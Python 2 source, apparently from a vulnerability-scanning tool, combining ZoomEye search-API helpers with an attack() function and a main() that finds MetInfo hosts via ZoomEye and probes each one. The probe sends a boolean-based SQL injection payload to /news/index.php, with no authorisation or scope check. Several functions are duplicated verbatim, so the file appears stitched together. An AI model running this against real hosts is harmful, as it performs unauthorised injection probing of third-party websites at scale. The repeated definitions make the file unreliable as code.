def _setAdvancedSearchArgs(self):
    """Fold ``self.advancedSearchArgs`` into a single query-filter string.

    Each value may be a list or a string; a string must be separated by
    commas or spaces.  Keys are accepted only when present in
    ``ZOOMEYE_ADVANCED_ARGS.ARGS``: app (component name contains), ver
    (version equals), os (operating system is), country, city, device
    (device type), port, hostname (contains), services (service type), ip
    (IP address), cidr (IP CIDR range), site (domain contains), desc
    (keyword contains), keywords (description contains).  Unknown keys are
    logged at ERROR level, the accepted keys are listed at DEBUG level, and
    the key is skipped.

    Returns:
        The concatenation of the fragments produced by
        ``self._setAdvancedSearch`` for every accepted key; "" when no key
        was accepted.
    """
    fragments = []
    for key, value in self.advancedSearchArgs.items():
        if key not in ZOOMEYE_ADVANCED_ARGS.ARGS:
            # Unknown filter: report it, show the accepted ones, move on.
            logger.error(
                "zoomeye advanced search args type error(app.advancedSearchArgs.{0}=\"{1}\")"
                .format(key, value))
            logger.debug("you can use there args,like:")
            for name, meaning in ZOOMEYE_ADVANCED_ARGS.ARGS.items():
                logger.debug("{0}:{1}".format(name, meaning))
            continue
        fragments.append(self._setAdvancedSearch(key, value))
    joined = "".join(fragments)
    if fragments:
        logger.info("zoomeye advanced search args[{0}]".format(joined))
    else:
        logger.info("set advanced search args defalut(empty)")
    return joined
def attack(url):
    """Probe one MetInfo host with a pair of requests and log if they differ.

    Two GET requests are sent to ``/news/index.php`` (Python 2 ``urllib2``):
    the first carries a ``search_sql`` parameter with a true boolean clause,
    the second a different parameter name with a false clause.  The host is
    reported as vulnerable only when the first response contains a
    ``shownews.php?lang=`` link and the second does not.

    Review notes (defender's view):
      * ``urlopen`` is called without a timeout, so an unresponsive host
        blocks the caller indefinitely.
      * The bare ``except: pass`` swallows every error (DNS, connection,
        HTTP, regex), so failures are indistinguishable from "not
        vulnerable"; narrow it and log at least at DEBUG level.
      * ``a`` is built but never used.
      * Only the marker's presence is compared; no authorisation or scope
        check is made before the requests are sent.
    """
    a = "http://{target}/news/index.php?".format(target=url)
    playLoadTrue = "http://{target}/news/index.php?"\
        "search_sql=%20123qwe%20"\
        "where%201234%3D1234%20--%20x&imgproduct=xxxx".format(target=url)
    playLoadFalse = "http://{target}/news/index.php?"\
        "serch_sql=%20123qwe%20"\
        "where%201234%3D1235%20--%20x&imgproduct=xxxx".format(target=url)
    try:
        # First request: expect the marker link in the body.
        req = urllib2.Request(playLoadTrue)
        resp = urllib2.urlopen(req)
        if resp.code != 200:
            return
        data_true = resp.read()
        # NOTE(review): the whole body is read into memory with no size cap.
        if not re.search(r'href=["\' ]shownews\.php\?lang=', data_true, re.M):
            return
        # Second request: expect the marker link to be absent.
        req = urllib2.Request(playLoadFalse)
        resp = urllib2.urlopen(req)
        if resp.code != 200:
            return
        data_false = resp.read()
        if re.search(r'href=["\' ]shownews\.php\?lang=', data_false, re.M):
            return
        logger.info("%s is vulnerable!" % url)
    except:
        # Any failure is silently treated as "not vulnerable".
        pass
def webSearch(self, query, facets=None, page=1):
    """Run a ZoomEye web search for ``query`` plus the advanced filters.

    Args:
        query: Base search expression; the string returned by
            ``self._setAdvancedSearchArgs`` is appended to it.
        facets: Optional facet selection, passed through to ``_baseSearch``.
        page: Result page number (default 1).

    Returns:
        The object returned by ``_baseSearch``.  Its ``"matches"`` entry is
        read for logging, so a result without that key raises here.
    """
    logger.info("zoomeye start searching web")
    full_query = query + self._setAdvancedSearchArgs()
    result = self._baseSearch(
        ZOOMEYEURL.WEBSEARCHURL, ZOOMEYE_FACETS.WEB, full_query, facets, page)
    match_count = len(result["matches"])
    logger.info("zoomeye web request request count is {0}".format(match_count))
    # The advanced-search filters are cleared after each search.
    self._clearnAdvancedSearch()
    # TODO: guard the "matches" lookup when result is empty.
    return result
def webSearch(self, query, facets=None, page=1):
    """Run a ZoomEye web search for ``query`` plus the advanced filters.

    Args:
        query: Base search expression; the string returned by
            ``self._setAdvancedSearchArgs`` is appended to it.
        facets: Optional facet selection, passed through to ``_baseSearch``.
        page: Result page number (default 1).

    Returns:
        The object returned by ``_baseSearch``.  Its ``"matches"`` entry is
        read for logging, so a result without that key raises here.
    """
    logger.info("zoomeye start searching web")
    full_query = query + self._setAdvancedSearchArgs()
    result = self._baseSearch(
        ZOOMEYEURL.WEBSEARCHURL, ZOOMEYE_FACETS.WEB, full_query, facets, page)
    match_count = len(result["matches"])
    logger.info("zoomeye web request request count is {0}".format(match_count))
    # The advanced-search filters are cleared after each search.
    self._clearnAdvancedSearch()
    # TODO: guard the "matches" lookup when result is empty.
    return result
def login(self):
    """Authenticate against ZoomEye and cache the JWT for later requests.

    Posts ``self.user`` / ``self.passwd`` to ``ZOOMEYEURL.LOGINURL`` through
    ``self._getRequests``, stores the returned ``access_token`` on the
    instance, builds ``self.header`` (``Authorization: JWT <token>``) and
    finally calls ``self._checkZoomeyeKey``.  The token value is kept out of
    the log output.
    """
    logger.info("zoomeye login is running")
    credentials = dict(username=self.user, password=self.passwd)
    result = self._getRequests(ZOOMEYEURL.LOGINURL, credentials)
    token = result["access_token"]
    self.access_token = token
    self.header = dict(Authorization='JWT ' + token)
    logger.info("zoomeye login successful")
    self._checkZoomeyeKey()
def main():
    """Entry point: search ZoomEye for "MetInfo" hosts and probe each one.

    Logs in with the credentials below, fetches page 1 of a host search,
    extracts the IP list with ``getIp_ZoomeyeSearch`` and calls ``attack``
    on every IP.

    Review notes:
      * ``user`` / ``passwd`` are empty placeholders; real credentials must
        come from configuration or the environment, not from source.
      * Every IP the search returns is probed; there is no allow-list or
        scope check between the search result and ``attack``.
    """
    logger.info("Attack module MetInfo is running")
    user = ""
    passwd = ""
    app = ZoomeyeSDK(user,passwd)
    ip_list = []
    app.login()
    result = app.hostSearch("MetInfo",page=1)
    ip_list = app.getIp_ZoomeyeSearch(result)
    for x in ip_list:
        logger.info("find ip:{0}".format(x))
    for ip in ip_list:
        attack(ip)
def login(self):
    """Authenticate against ZoomEye and cache the JWT for later requests.

    Posts ``self.user`` / ``self.passwd`` to ``ZOOMEYEURL.LOGINURL`` through
    ``self._getRequests``, stores the returned ``access_token`` on the
    instance, builds ``self.header`` (``Authorization: JWT <token>``) and
    finally calls ``self._checkZoomeyeKey``.  The token value is kept out of
    the log output.
    """
    logger.info("zoomeye login is running")
    credentials = dict(username=self.user, password=self.passwd)
    result = self._getRequests(ZOOMEYEURL.LOGINURL, credentials)
    token = result["access_token"]
    self.access_token = token
    self.header = dict(Authorization='JWT ' + token)
    logger.info("zoomeye login successful")
    self._checkZoomeyeKey()
def _setTarget(self, url, query, facets=None, page=1):
    """Build the full search URL for ``url`` with the query as GET parameters.

    ``query`` and ``page`` are always encoded; ``facet`` is added only when
    ``facets`` is truthy.  The resulting URL is logged at INFO level.

    Returns:
        ``url`` followed by ``?`` and the url-encoded parameters.
    """
    params = {"query": query, "page": page}
    if facets:
        params["facet"] = facets
    target = "%s?%s" % (url, urllib.urlencode(params))
    logger.info("search target:{0}".format(target))
    return target
def _setTarget(self, url, query, facets=None, page=1):
    """Build the full search URL for ``url`` with the query as GET parameters.

    ``query`` and ``page`` are always encoded; ``facet`` is added only when
    ``facets`` is truthy.  The resulting URL is logged at INFO level.

    Returns:
        ``url`` followed by ``?`` and the url-encoded parameters.
    """
    params = {"query": query, "page": page}
    if facets:
        params["facet"] = facets
    target = "%s?%s" % (url, urllib.urlencode(params))
    logger.info("search target:{0}".format(target))
    return target
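def _checkArgumentsFacets(self, facetEnums, facets):
    """Normalise a requested facet selection against the accepted facets.

    Args:
        facetEnums: Iterable of accepted facet names (lower-case).
        facets: Requested facets as a list/tuple/set of names or a single
            comma-separated string.  Matching is case-insensitive; blank
            entries and surrounding whitespace are ignored.

    Returns:
        None when ``facets`` is empty/None.  Otherwise a comma-separated
        string of the accepted facets in the order they were given, with
        duplicates removed; "" when none were accepted.  Rejected names are
        logged at ERROR level.

    Fixes over the previous version: a tuple no longer crashes on ``split``,
    ``"a, b"`` no longer produces an unmatched `` b``, and the output order
    follows the input instead of set iteration order, so the query string
    built from it is deterministic.
    """
    if not facets:
        return None
    # Anything that is not already a collection is treated as a
    # comma-separated string (this is what the caller passes in practice).
    if not isinstance(facets, (list, tuple, set, frozenset)):
        facets = facets.split(",")
    # Normalise case/whitespace and dedupe while preserving input order.
    requested = []
    seen = set()
    for raw in facets:
        name = raw.strip().lower()
        if name and name not in seen:
            seen.add(name)
            requested.append(name)
    allowed = set(facetEnums)
    accepted = [name for name in requested if name in allowed]
    rejected = [name for name in requested if name not in allowed]
    if not accepted:
        logger.error("facets can not accent:{0}".format(requested))
        logger.error("facets only can accent:{0}".format(allowed))
        logger.error("input facets error.")
        logger.info("set default facets empty.")
    elif rejected:
        logger.error("facets can not accent:{0}".format(rejected))
        logger.error("facets only can accent:{0}".format(allowed))
        logger.info("set facets:{0}".format(accepted))
    result = ",".join(accepted)
    logger.debug("facets:{0}".format(result))
    return result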
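def _checkArgumentsFacets(self, facetEnums, facets):
    """Normalise a requested facet selection against the accepted facets.

    Args:
        facetEnums: Iterable of accepted facet names (lower-case).
        facets: Requested facets as a list/tuple/set of names or a single
            comma-separated string.  Matching is case-insensitive; blank
            entries and surrounding whitespace are ignored.

    Returns:
        None when ``facets`` is empty/None.  Otherwise a comma-separated
        string of the accepted facets in the order they were given, with
        duplicates removed; "" when none were accepted.  Rejected names are
        logged at ERROR level.

    Fixes over the previous version: a tuple no longer crashes on ``split``,
    ``"a, b"`` no longer produces an unmatched `` b``, and the output order
    follows the input instead of set iteration order, so the query string
    built from it is deterministic.
    """
    if not facets:
        return None
    # Anything that is not already a collection is treated as a
    # comma-separated string (this is what the caller passes in practice).
    if not isinstance(facets, (list, tuple, set, frozenset)):
        facets = facets.split(",")
    # Normalise case/whitespace and dedupe while preserving input order.
    requested = []
    seen = set()
    for raw in facets:
        name = raw.strip().lower()
        if name and name not in seen:
            seen.add(name)
            requested.append(name)
    allowed = set(facetEnums)
    accepted = [name for name in requested if name in allowed]
    rejected = [name for name in requested if name not in allowed]
    if not accepted:
        logger.error("facets can not accent:{0}".format(requested))
        logger.error("facets only can accent:{0}".format(allowed))
        logger.error("input facets error.")
        logger.info("set default facets empty.")
    elif rejected:
        logger.error("facets can not accent:{0}".format(rejected))
        logger.error("facets only can accent:{0}".format(allowed))
        logger.info("set facets:{0}".format(accepted))
    result = ",".join(accepted)
    logger.debug("facets:{0}".format(result))
    return result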
def _setAdvancedSearchArgs(self):
    """Fold ``self.advancedSearchArgs`` into a single query-filter string.

    Each value may be a list or a string; a string must be separated by
    commas or spaces.  Keys are accepted only when present in
    ``ZOOMEYE_ADVANCED_ARGS.ARGS``: app (component name contains), ver
    (version equals), os (operating system is), country, city, device
    (device type), port, hostname (contains), services (service type), ip
    (IP address), cidr (IP CIDR range), site (domain contains), desc
    (keyword contains), keywords (description contains).  Unknown keys are
    logged at ERROR level, the accepted keys are listed at DEBUG level, and
    the key is skipped.

    Returns:
        The concatenation of the fragments produced by
        ``self._setAdvancedSearch`` for every accepted key; "" when no key
        was accepted.
    """
    fragments = []
    for key, value in self.advancedSearchArgs.items():
        if key not in ZOOMEYE_ADVANCED_ARGS.ARGS:
            # Unknown filter: report it, show the accepted ones, move on.
            logger.error(
                "zoomeye advanced search args type error(app.advancedSearchArgs.{0}=\"{1}\")"
                .format(key, value))
            logger.debug("you can use there args,like:")
            for name, meaning in ZOOMEYE_ADVANCED_ARGS.ARGS.items():
                logger.debug("{0}:{1}".format(name, meaning))
            continue
        fragments.append(self._setAdvancedSearch(key, value))
    joined = "".join(fragments)
    if fragments:
        logger.info("zoomeye advanced search args[{0}]".format(joined))
    else:
        logger.info("set advanced search args defalut(empty)")
    return joined
def resourcesInfo(self):
    """Fetch the account's ZoomEye resource info and write it to the log.

    Calls ``self._getRequests`` on ``ZOOMEYEURL.RESOURCESINFOURL`` and logs
    the raw result at INFO level.  Nothing is returned.
    """
    logger.info("zoomeye recorces info is running")
    info = self._getRequests(ZOOMEYEURL.RESOURCESINFOURL)
    logger.info("zoomeye resource info:{0}".format(info))